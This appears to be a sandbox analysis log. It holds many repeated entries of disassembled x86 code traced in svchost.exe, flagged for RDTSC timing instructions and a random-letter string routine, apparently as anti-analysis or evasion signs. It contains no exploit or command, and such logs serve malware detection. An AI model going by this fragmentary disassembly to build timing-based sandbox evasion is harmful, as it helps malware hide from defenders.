Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F8F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FBF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59504h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59213h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594D3h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FB96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59213h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F7F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA594F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA590F3h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59130h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FB96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F7D6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59510h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA594F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FB96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA591F5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4FBF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA591D0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
